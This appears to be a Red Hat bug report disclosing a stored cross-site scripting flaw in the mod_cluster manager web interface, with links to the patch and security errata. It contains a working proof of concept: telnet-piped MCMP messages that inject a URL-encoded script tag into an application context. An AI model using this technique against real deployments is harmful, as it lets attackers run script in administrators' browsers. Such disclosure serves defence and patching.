Michal Babacek from Red Hat discovered [1] that it's possible to iject arbitrary JavaScript code in the mod_manager web interface using MCMP messages: - With mod_cluster Manager running on 127.0.0.1:6666 run the commands below: """ { echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo ""; echo "JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10"; sleep 1;} | telnet 127.0.0.1 6666 { echo "ENABLE-APP / HTTP/1.1"; echo "Host: localhost.localdomain:6666"; echo "Content-Length: 102"; echo "User-Agent: ClusterListener%2F1.0"; echo ""; echo 'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E'; sleep 1;} | telnet 127.0.0.1 6666 """ - Open http://localhost:6666/mod_cluster_manager and you'll see a JavaScript pop-up Alert being executed. Proposed (intrusive) patch and further discussion is available at [1]. [1]: https://issues.jboss.org/browse/MODCLUSTER-453
Ad Comment 0: [1] https://issues.jboss.org/secure/attachment/12388047/12388047_MODCLUSTER-453_master-better_one.patch
removing embargo due to patch has been included in EAP 6.4.
This issue has been addressed in the following products: JBoss Web Server 2.1.0 Via RHSA-2015:1641 https://rhn.redhat.com/errata/RHSA-2015-1641.html
This issue has been addressed in the following products: JBEWS 2 for RHEL 6 JBEWS 2 for RHEL 7 JBEWS 2 for RHEL 5 Via RHSA-2015:1642 https://rhn.redhat.com/errata/RHSA-2015-1642.html